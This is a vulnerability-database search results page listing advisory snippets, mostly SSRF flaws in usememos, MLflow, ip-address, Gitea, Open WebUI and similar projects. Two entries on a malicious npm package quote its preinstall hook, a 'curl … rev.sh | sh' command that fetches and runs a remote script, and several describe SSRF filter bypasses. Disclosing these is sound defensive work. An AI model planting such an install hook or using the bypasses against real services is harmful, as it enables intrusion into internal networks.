Lucene search
+L

128 matches found

CVE
CVE
added 19 hours ago10 views

CVE-2026-51583

The CVE affects usememos prior to or up to v0.30.0, where a flaw in the Webhook validation logic (internal/webhook/validate.go) allows a remote authenticated attacker to perform Server-Side Request Forgery (SSRF) by targeting an internal address. Public details confirm the vulnerability and its i...

5.4AI score
SaveExploits0References2
EUVD
EUVD
added 19 hours ago6 views

EUVD-2026-56176

An issue in usememos through v0.30.0 allows a remote authenticated attacker to perform Server-Side Request Forgery SSRF via the Webhook validation mechanism in internal/webhook/validate.go, by setting a webhook target to an internal address...

5.3AI score
SaveExploits0References2
OSV
OSV
added 5 days ago6 views

MAL-2026-13483 Malicious code in internallib_v514 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1fd60db78a1e9a35296f653bfc8b5a814877c6c71b274b7ed8dcaa9e732609ea package.json declares a preinstall lifecycle hook that runs curl http://10.0.70.90/rev.sh | sh, fetching an unpinned shell script from a bare interna...

6.2AI score
SaveExploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 5 days ago12 views

Malicious code in internallib_v514 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1fd60db78a1e9a35296f653bfc8b5a814877c6c71b274b7ed8dcaa9e732609ea package.json declares a preinstall lifecycle hook that runs curl http://10.0.70.90/rev.sh | sh, fetching an unpinned shell script from a bare interna...

6.1AI score
SaveExploits0References2
Snyk
Snyk
added 6 days ago15 views

Server-side Request Forgery (SSRF)

Overview mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models. Affected versions of this package are vulnerable to Server-side Request Forgery SSRF via the rawproxy. An attacker can...

7.1CVSS5.4AI score0.00209EPSS
SaveExploits1References2
NVD
NVD
added 6 days ago9 views

CVE-2026-71211

MLflow's AI Gateway accepts an authconfig.apibase value when creating a gateway secret mlflow/server/handlers.py, creategatewaysecret with no validation of scheme, host, or IP range; the value is stored verbatim. The gateway proxy endpoint mlflow/server/gatewayapi.py, rawproxy subsequently issues...

7.1CVSS0.00209EPSS
SaveExploits1References1
EUVD
EUVD
added 6 days ago10 views

EUVD-2026-53208

MLflow's AI Gateway accepts an authconfig.apibase value when creating a gateway secret mlflow/server/handlers.py, creategatewaysecret with no validation of scheme, host, or IP range; the value is stored verbatim. The gateway proxy endpoint mlflow/server/gatewayapi.py, rawproxy subsequently issues...

7.1CVSS5.6AI score0.00209EPSS
SaveExploits1References1
NVD
NVD
added 2026/08/03 8:17 p.m.9 views

CVE-2026-69198

ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. From 10.1.1 until 10.2.2, every special-use classification method is built on isInSubnet, which short-circuits to false whenever the address's own subnet mask is shorter than the reference range's mask. Th...

6.9CVSS0.00276EPSS
SaveExploits0References3
OSV
OSV
added 2026/08/03 8:17 p.m.4 views

UBUNTU-CVE-2026-69198

ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. From 10.1.1 until 10.2.2, every special-use classification method is built on isInSubnet, which short-circuits to false whenever the address's own subnet mask is shorter than the reference range's mask. Th...

6.9CVSS5.5AI score0.00276EPSS
SaveExploits0References5
Github Security Blog
Github Security Blog
added 2026/08/03 7:59 p.m.9 views

ip-address: a CIDR suffix on the parsed address suppresses special-use classification and can bypass SSRF and trust-boundary checks

Summary Every special-use classification method is built on isInSubnet, which short-circuits to false whenever the address's own subnet mask is shorter than the reference range's mask. That mask comes verbatim from the CIDR suffix on the parsed input, so appending a suffix such as /0 suppresses...

6.9CVSS5.5AI score0.00276EPSS
SaveExploits0References4Affected Software1
Cvelist
Cvelist
added 2026/07/30 4:27 p.m.37 views

CVE-2026-54722 dssrf: there a critical security bug with remove_at_symbol_in_string

DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.0.4, isurlsafe in src/helpers.ts strips the @ userinfo delimiter with removeatsymbolinstring before new URL parses the URL, allowing an attacker-controlled URL to bypass internal-IP...

8.7CVSS0.00328EPSS
SaveExploits0References4
EUVD
EUVD
added 2026/07/30 2:48 p.m.12 views

EUVD-2026-50465

Flyto2 Core: Guarded HTTP modules follow redirects into internal space without per-hop SSRF revalidation...

8.5CVSS5.8AI score0.00236EPSS
SaveExploits0References4
NVD
NVD
added 2026/07/29 7:16 p.m.11 views

CVE-2026-67424

Flyto2 Core is an execution kernel for automation and AI-agent workflows. Prior to 2.26.7, the HTTP modules http.get, http.request, and http.batch in src/core/modules/atomic/http/get.py, src/core/modules/atomic/http/request.py, and src/core/modules/atomic/http/batch.py validate only the initial...

8.5CVSS0.00236EPSS
SaveExploits0References3
ATTACKERKB
ATTACKERKB
added 2026/07/29 6:32 p.m.11 views

CVE-2026-67424

Flyto2 Core is an execution kernel for automation and AI-agent workflows. Prior to 2.26.7, the HTTP modules http.get, http.request, and http.batch in src/core/modules/atomic/http/get.py, src/core/modules/atomic/http/request.py, and src/core/modules/atomic/http/batch.py validate only the initial...

8.5CVSS6AI score0.00236EPSS
SaveExploits0References4Affected Software1
OSV
OSV
added 2026/07/21 8:33 p.m.5 views

GHSA-RQHX-647V-WX32 Gitea: SSRF via HTTP Redirect in Repository Migration

Summary Gitea 1.25.4 validates the initial URL provided to the repository migration endpoint POST /api/v1/repos/migrate and correctly blocks requests to internal addresses like 127.0.0.1 or RFC1918 ranges. However, if the initial URL points to an attacker-controlled server that responds with an...

6.5CVSS5.4AI score0.00244EPSS
SaveExploits0References7
Positive Technologies
Positive Technologies
added 2026/07/21 12:0 a.m.7 views

PT-2026-63308

Name of the Vulnerable Software and Affected Versions Gitea affected versions not specified Description An authenticated low-privilege user can perform a server-side request forgery SSRF during repository migration. The issue occurs because the validation logic in services/migrations/migrate.go...

6.5CVSS5.9AI score
SaveExploits0References5
EUVD
EUVD
added 2026/07/20 6:10 p.m.12 views

EUVD-2026-46055

The Joomla extension JMedia is vulnerable to an SSRF vulnerability. Remote-URL download could target internal/reserved addresses...

5.1CVSS5.2AI score0.00229EPSS
SaveExploits0References1
NVD
NVD
added 2026/07/16 2:16 p.m.11 views

CVE-2026-35142

HCL DFXAnalytics is affected by an Internal IP Address Disclosure vulnerability. The application includes internal IP address details within its generated server responses, which could allow a remote attacker to gather sensitive network topology information and use it to map the internal...

8.2CVSS0.00183EPSS
SaveExploits0References1
OSV
OSV
added 2026/07/13 3:19 p.m.7 views

PYSEC-2026-2702 Open WebUI has a full SSRF Vulnerability in the RAG Web Search Feature

SSRF Bypass via IPv6/IPv4-mapped IPv6/IPv4-reserved-ranges in validateurl Summary validateurl in backend/openwebui/retrieval/web/utils.py calls validators.ipv6ip, private=True, but the validators library does NOT implement the private keyword for IPv6 — the call raises a ValidationError which is...

8.5CVSS7AI score0.00286EPSS
SaveExploits1References7
NVD
NVD
added 2026/07/09 11:17 p.m.14 views

CVE-2026-33655

New API is a large language mode LLM gateway and artificial intelligence AI asset management system. Prior to 0.12.0-alpha.1, the default SSRF protection configuration did not apply IP filtering to hostnames; with ApplyIPFilterForDomain disabled by default, URL validation checked domain allow/blo...

7.7CVSS0.00265EPSS
SaveExploits0References3
Rows per page
Query Builder